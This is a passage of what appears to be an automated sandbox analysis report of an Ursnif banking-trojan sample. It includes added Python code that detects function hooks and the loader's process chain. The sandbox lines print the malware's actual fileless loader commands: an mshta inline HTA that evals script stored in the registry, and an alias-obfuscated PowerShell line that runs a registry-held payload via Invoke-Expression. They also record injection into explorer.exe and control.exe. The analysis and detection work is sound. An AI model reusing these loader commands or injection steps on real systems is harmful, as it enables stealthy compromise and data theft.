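    if len(live) >= 6 and live[0] == 0x68 and live[5] == 0xC3:  # push imm32 ; ret
        return f"push {struct.unpack_from('<I', live, 1)[0]:#x}; ret"
    return None


def check_inline(function, clean, live, addr=None):
    """clean: the export's first bytes from a fresh mapping of the on-disk image
    (relocations applied); live: the same bytes read from the target process."""
    n = min(len(clean), len(live))
    if clean[:n] == live[:n]:
        return None
    detail = decode_redirect(live, addr) or f"unrecognised patch {live[:n].hex()} (clean {clean[:n].hex()})"
    return HookFinding(function, "inline", detail)


def check_tables(entries, image_ranges):
    """entries: {(module, function): resolved address} read from a process's IAT
    or a module's EAT; image_ranges: {module: (base, size)} of the modules that
    own those functions. An entry resolving outside its owner has been redirected."""
    findings = []
    for (module, function), target in entries.items():
        if module not in image_ranges:
            continue                                            # nothing to compare against
        base, size = image_ranges[module]
        if not base <= target < base + size:
            findings.append(HookFinding(f"{module}!{function}", "table",
                                        f"resolves to {target:#x}, outside [{base:#x}, {base + size:#x})"))
    return findings


# Constructed sample data: a common x64 prologue (mov [rsp+8],rbx ; mov [rsp+16],rsi),
# then the same bytes with a 5-byte jmp written over them by a hook.
CLEAN_PROLOGUE = bytes.fromhex("48895c24084889742410")
FUNC_ADDR = 0x7FFA00011000                     # assumed address of the export in the target
HOOKED_PROLOGUE = b"\xe9" + struct.pack("<i", 0x1000) + CLEAN_PROLOGUE[5:]
SAMPLE_RANGES = {"KERNEL32.DLL": (0x7FFA00000000, 0xB0000)}
SAMPLE_IAT = {
    ("KERNEL32.DLL", "CreateProcessAsUserW"): 0x1C32A8E0000,   # anonymous memory: redirected
    ("KERNEL32.DLL", "GetProcAddress"): 0x7FFA00020330,        # inside KERNEL32: untouched
}


def triage():
    """Run both checks over the sample data and return the findings."""
    findings = []
    inline = check_inline("KERNEL32.DLL!CreateProcessAsUserW", CLEAN_PROLOGUE, HOOKED_PROLOGUE, FUNC_ADDR)
    if inline:
        findings.append(inline)
    return findings + check_tables(SAMPLE_IAT, SAMPLE_RANGES)


if __name__ == "__main__":
    for f in triage():
        print(f"{f.kind:6} {f.function}: {f.detail}")
```

On a real dump the interesting output is where the redirect lands: a jmp into a private, executable, non-image region of explorer.exe is the injected Ursnif module, and its address is what you carve and scan with the Yara rules listed above. Hot-patch padding and export forwarders are legitimate reasons for the first bytes to differ from a naive disk read, so compare against a properly mapped image rather than the raw file.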
Source: C:\Users\user\Desktop\bf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4756 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9741
Source: C:\Users\user\Desktop\bf.exe Process information queried: ProcessInformation
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 0000000C.00000002.723650816.00000262EC513000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.739217384.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.716253522.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: control.exe, 0000000C.00000002.723789714.00000262EC534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&u
Source: mshta.exe, 00000004.00000002.635584727.00000212A473E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\bf.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\bf.exe Memory written: C:\Windows\System32\control.exe base: 7FF7F7F712E0
Source: C:\Users\user\Desktop\bf.exe Thread register set: target process: 4784
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 29561580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 29561580
Source: unknown Process created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "about:<hta:application><script>ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Users\user\Desktop\bf.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"
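The process chain recorded above is the fileless Ursnif loader: mshta.exe runs an inline HTA whose script eval()s whatever WScript.Shell.RegRead returns from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>; that script starts powershell.exe, which hides Get-ItemProperty and Invoke-Expression behind two New-Alias names and executes the UrlsReturn value of the same key; and the PowerShell stage compiles C# at runtime, which is the footprint Add-Type leaves (csc.exe and cvtres.exe working on a .cmdline file in %TEMP%, the Sigma hit in the summary). The Python below is an added example, not part of the sandbox output, that turns these lines into detection logic: it removes the alias indirection so the real cmdlets are visible, flags each stage of the chain in process-creation events, and extracts the GUID-named key for hunting. The events are constructed from the command lines above with an assumed field layout (image, parent_image, command_line); the parent of mshta.exe is left empty because the report records it as unknown.

```python
"""
Detection logic for the fileless Ursnif loader chain in this report: mshta.exe
running an inline HTA that eval()s script read from the registry, powershell.exe
hiding Get-ItemProperty / Invoke-Expression behind New-Alias, and csc.exe
compiling a .cmdline file out of %TEMP%. Added example, not sandbox output.
The event records are constructed from the report's command lines; the field
names are an assumed log layout, not a real product schema.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent; "" where the report says unknown
    command_line: str


EXE_PREFIX_RE = re.compile(r'^\s*"[^"]*"\s*')        # leading quoted executable path
ALIAS_RE = re.compile(
    r"(?<![\w-])(?:new-alias|set-alias|nal|sal)\s+(?:-name\s+)?([^\s;]+)\s+(?:-value\s+)?([^\s;]+)", re.I)
URSNIF_KEY_RE = re.compile(                          # HKCU\Software\AppDataLow\Software\Microsoft\<GUID>
    r"hkcu[:\\]+software[\\]+appdatalow[\\]+software[\\]+microsoft[\\]+"
    r"([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})", re.I)
TEMP_CMDLINE_RE = re.compile(r'@"?[^"]*\\temp\\[^"\\]+\.cmdline', re.I)
BUILTIN_ALIASES = {"gp": "Get-ItemProperty", "iex": "Invoke-Expression"}


def resolve_aliases(command_line):
    """Strip New-Alias indirection from a PowerShell command line and expand the
    built-in aliases it points at, so the real cmdlets are visible. Statements are
    split on ';' (fine for one-liners; a ';' inside a string would confuse it)."""
    script = EXE_PREFIX_RE.sub("", command_line)
    mapping = dict(BUILTIN_ALIASES)
    kept = []
    for stmt in script.split(";"):
        m = ALIAS_RE.search(stmt)
        if m:                                        # definition: remember it, drop the statement
            name, target = m.group(1).lower(), m.group(2)
            mapping[name] = mapping.get(target.lower(), target)
        elif stmt.strip():
            kept.append(stmt.strip())
    out = "; ".join(kept)
    for name in sorted(mapping, key=len, reverse=True):
        out = re.sub(r"(?<![\w-])" + re.escape(name) + r"(?![\w-])",
                     lambda _m, t=mapping[name]: t, out, flags=re.I)
    return out


def classify(ev):
    """Return the loader-chain indicators a single process-creation event matches."""
    hits = []
    image, cl = ev.image.lower(), ev.command_line.lower()
    if image.endswith("\\mshta.exe") and "about:<hta:application>" in cl and ".regread(" in cl:
        hits.append("mshta_inline_hta_evals_registry_script")
    if image.endswith("\\powershell.exe"):
        if ALIAS_RE.search(cl):
            hits.append("powershell_alias_indirection")
        resolved = resolve_aliases(ev.command_line).lower()
        if "invoke-expression" in resolved and "appdatalow" in resolved:
            hits.append("powershell_iex_from_appdatalow_registry")
    if (image.endswith("\\csc.exe") and ev.parent_image.lower().endswith("\\powershell.exe")
            and TEMP_CMDLINE_RE.search(cl)):
        hits.append("csc_compiles_cmdline_from_temp")
    return hits


def analyze(events):
    """Run classify() over a batch of events and collect the GUID-named registry
    keys the chain reads, for hunting on other hosts."""
    indicators, keys = {}, set()
    for ev in events:
        hits = classify(ev)
        if hits:
            indicators.setdefault(ev.image.rsplit("\\", 1)[-1].lower(), []).extend(hits)
        m = URSNIF_KEY_RE.search(ev.command_line)
        if m:
            keys.add(m.group(1).lower())
    return {"indicators": indicators, "registry_keys": sorted(keys)}


# Constructed events mirroring the command lines recorded above.
MSHTA_CMD = (
    r'''"c:\windows\system32\mshta.exe" "about:<hta:application><script>'''
    r'''ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw).regread('hkcu\\\software'''
    r'''\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));'''
    r'''if(!window.flag)close()</script>"'''
)
POWERSHELL_CMD = (
    r'"c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; '
    r'new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring('
    r'(rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))'
)
CSC_CMD = (
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
    r'@"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline"'
)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", "", MSHTA_CMD),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe", POWERSHELL_CMD),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", CSC_CMD),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe",   # benign control
              r'"C:\Windows\System32\notepad.exe"'),
]

if __name__ == "__main__":
    print(resolve_aliases(POWERSHELL_CMD))
    print(analyze(SAMPLE_EVENTS))
```

The alias names (rxihymmmsf, qvfmhhdt) and the GUID are per-infection values and make poor static signatures; the shape is what to hunt for: mshta with an about: HTA that calls RegRead, PowerShell defining aliases for gp/iex and reading a value under AppDataLow\Software\Microsoft, and csc.exe spawned by PowerShell. The sample also queries HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid in this same section, so expect the key name to differ from host to host and match on the AppDataLow\Software\Microsoft\<GUID> pattern, as the regex above does.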
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.711857959.00000000086BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.676177436.0000000005910000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.666643189.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723069999.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.696674053.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\bf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\control.exe Code function: 12_2_004963E0 CreateMutexExA,GetUserNameA, 12_2_004963E0

Stealing of Sensitive Information

Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
Source: Yara match File source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY